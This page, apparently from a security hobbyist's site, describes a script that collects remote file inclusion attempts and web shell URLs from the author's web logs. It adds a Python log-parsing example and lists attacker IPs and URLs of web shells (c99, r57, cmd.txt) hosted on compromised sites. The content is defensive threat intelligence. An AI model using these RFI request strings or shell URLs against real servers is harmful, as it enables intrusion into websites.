Web Shells and RFIs Collection

I wrote a little script that periodically looks through my web logs for unique RFIs and Web Shells and collects them on one page, where I can go look at them or download them to add to my Web Shell library. Many of these attacks are repeated multiple times, so I ignore the time fields when judging whether an RFI/Web Shell is unique. I've coded it to weed out links to Web Shells that 404. I also use nofollow and a referrer-hiding service so it does not look like I'm attacking anyone with the web shells (though the check for 404 sort of looks suspicious). This page will also let you link off to defense.ballastsecurity.net, where you can use their PHP decoder to look at the obfuscated code. Enjoy my Web Shell zoo; it should update itself every hour or so. If you see your domain on the list of websites hosting Web Shells, you are likely pwned and should clean up your server.
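The log-mining step described above, written out as an added example. This is not Irongeek's own script (its source is linked from this page); it shows one way to do the same job: parse Apache combined-format access-log lines, pull out any remote URL an attacker supplied as an include target, treat every field except the timestamp as the uniqueness key, and split live from dead links. The page's script does a real HTTP check for 404s; here the status lookup is an injected callable backed by a constructed table so the code runs offline. All log lines, IPs (RFC 5737 test ranges) and hostnames (RFC 2606 example domains) are constructed and stand in for real attackers and shell hosts.

```python
import re
from urllib.parse import urlparse, parse_qsl

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# An include target that points off-box is what makes a request an RFI attempt.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def remote_urls_in_request(path):
    """Return remote URLs the attacker tried to feed into an include.

    Two shapes are covered: the whole request target is a URL (proxy-style
    request line), or one or more query-string values are URLs. parse_qsl
    percent-decodes, so http%3A%2F%2F... is caught as well.
    """
    if REMOTE_RE.match(path):
        return [path]
    return [v for _, v in parse_qsl(urlparse(path).query, keep_blank_values=True)
            if REMOTE_RE.match(v.strip())]


def parse_rfi_attempts(lines):
    """Yield one record per RFI attempt found; lines that do not parse or carry
    no remote URL are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for url in remote_urls_in_request(m['path']):
            yield {'ip': m['ip'], 'url': url, 'agent': m['agent'],
                   'referer': m['referer'], 'time': m['time']}


def unique_attempts(attempts):
    """Dedupe the way the page describes: everything except the time field
    decides uniqueness, and the first sighting of each key is kept."""
    seen = {}
    for a in attempts:
        key = (a['ip'], a['url'], a['agent'], a['referer'])
        seen.setdefault(key, a)
    return list(seen.values())


def split_by_liveness(attempts, status_of):
    """Partition into (live, dead). status_of(url) returns an HTTP status code
    or None for unreachable; 404 and unreachable both count as dead."""
    live, dead = [], []
    for a in attempts:
        code = status_of(a['url'])
        (live if code is not None and code != 404 else dead).append(a)
    return live, dead


def display_url(url, limit=60):
    """Truncate for display as the page's table does (60 chars, no ellipsis)."""
    return url if len(url) <= limit else url[:limit]


# Constructed sample log: two repeats of one attempt, one attempt seen two ways
# (percent-encoded query value, then proxy-style request), and one benign hit.
SAMPLE_LOG = [
    '203.0.113.10 - - [27/Jun/2016:18:35:28 -0700] "GET /index.php?page=http://shells.example.net/c.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [27/Jun/2016:19:02:11 -0700] "GET /index.php?page=http://shells.example.net/c.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [28/Jun/2016:01:14:03 -0700] "GET /wp-content/plugins/x/view.php?file=http%3A%2F%2Fdead.example.org%2Fr.txt HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '198.51.100.7 - - [28/Jun/2016:01:14:05 -0700] "GET http://dead.example.org/r.txt HTTP/1.1" 400 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.0.2.55 - - [28/Jun/2016:02:00:00 -0700] "GET /about.html HTTP/1.1" 200 1200 "http://www.example.com/" "Mozilla/5.0"',
]

# Constructed stand-in for the real HTTP check: anything not listed is unreachable.
FAKE_STATUS = {'http://shells.example.net/c.txt?': 200}


def demo():
    """Run the pipeline over the constructed log and return (live, dead)."""
    uniq = unique_attempts(parse_rfi_attempts(SAMPLE_LOG))
    return split_by_liveness(uniq, FAKE_STATUS.get)


if __name__ == '__main__':
    for label, rows in zip(('Likely live', 'Likely dead'), demo()):
        print(label)
        for a in rows:
            print(' | '.join([a['ip'], display_url(a['url']), a['agent'],
                              a['referer'], a['time']]))
```

Keying on the attacker IP as well as the URL is what the page's tables show (the same ds.txt shell appears under two different IPs); if you only want one row per shell URL, drop `ip` from the key in `unique_attempts`.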

Source code that generates this page

Filtered For More Likely Live Webshell RFIs

Columns: Attacker | Request (truncated if over 60 chr for display; link should still work) | Agent | Referer | Time | Backup. On the live page each attacker IP links to a Whois lookup and each request links to the PHP Decoder.

124.107.39.195 | http://www.w0rms.com/shell/cihshell.txt | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 | - | 27/Jun/2016:18:35:28 -0700 | Archived Webshell
187.40.71.203 | http://www.parcours-artistes-chaudfontaine-sprimont-trooz.be | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 27/Jun/2016:13:50:21 -0700 | Archived Webshell

Likely Dead Links

Columns: Attacker | Request (truncated if over 60 chr for display; link should still work) | Agent | Referer | Time | Backup. On the live page each attacker IP links to a Whois lookup and each request links to the PHP Decoder.

187.79.4.150 | http://www.parcours-artistes-chaudfontaine-sprimont-trooz.be | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 01/Jun/2016:06:19:24 -0700 | Archived Webshell
189.49.187.138 | http://www.ceap.br/Folder_Baru/ds.txt?r&=id&& | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 23/Jun/2016:08:09:56 -0700 | Archived Webshell
52.38.114.22 | http://doa.go.th/ard/images/2016.txt? | - | - | 21/Jun/2016:14:18:47 -0700 | Archived Webshell
136.243.95.184 | http://www.protecciondebalcones.com/site/wp-includes/images/ | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html | - | 15/Jun/2016:22:52:10 -0700 | Archived Webshell
186.227.186.72 | http://www.boemieditore.com/media/stalker/icons/black/rfienv | - | - | 07/Jun/2016:03:48:40 -0700 | Archived Webshell
200.98.201.251 | http://advancedcorretora.com.br/corretora/testevull.txt? | - | - | 25/May/2016:05:28:26 -0700 | Archived Webshell
177.14.240.150 | http://blogdosuccar.com.br/xxx1/cmd.txt? | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 07/Jun/2016:14:12:13 -0700 | Archived Webshell
200.98.201.251 | http://acanetaroyal.com.br/testevull.txt? | - | - | 18/Jun/2016:18:56:26 -0700 | Archived Webshell
177.14.240.150 | http://ikasaweb.com.br/plugin/mail/..txt? | Mozilla/3.0 (compatible; Indy Library) | - | 10/Jun/2016:06:10:47 -0700 | Archived Webshell
177.14.240.150 | http://www.freightcubesystems.com.au/opa.txt? | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 30/May/2016:15:15:41 -0700 | Archived Webshell
177.14.240.150 | http://www.freightcubesystems.com.au/opa.txt | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 30/May/2016:08:09:07 -0700 | Archived Webshell
187.79.11.120 | http://www.ceap.br/Folder_Baru/ds.txt? | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 03/Jun/2016:03:26:09 -0700 | Archived Webshell
200.98.201.251 | http://www.mylovelybeads.com/contest/testevull.txt? | - | - | 09/Jun/2016:03:49:28 -0700 | Archived Webshell
187.41.251.68 | http://www.hidayah.edu.my/plugins/zeno.txt? | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 01/Jun/2016:19:58:14 -0700 | Archived Webshell
187.56.81.192 | http://www.hccindia.com/up.txt? | - | - | 05/Jun/2016:01:12:14 -0700 | Archived Webshell
187.79.7.254 | http://www".parcours-artistes-chaudfontaine-sprimont-tr | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 02/Jun/2016:12:21:28 -0700 | Not In Archive
79.44.23.18 | http://beedar.com/c99.txt | Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4 | - | 01/Jun/2016:06:57:34 -0700 | Not In Archive
177.14.240.158 | http://ndahijab.com/r57.txt? | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | - | 30/May/2016:19:25:18 -0700 | Archived Webshell
186.227.186.70 | http://www.mrcerimonialeventos.com.br/plugins/system/RfiEmai | - | - | 24/May/2016:23:57:09 -0700 | Archived Webshell

If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2016, IronGeek
Louisville / Kentuckiana Information Security Enthusiast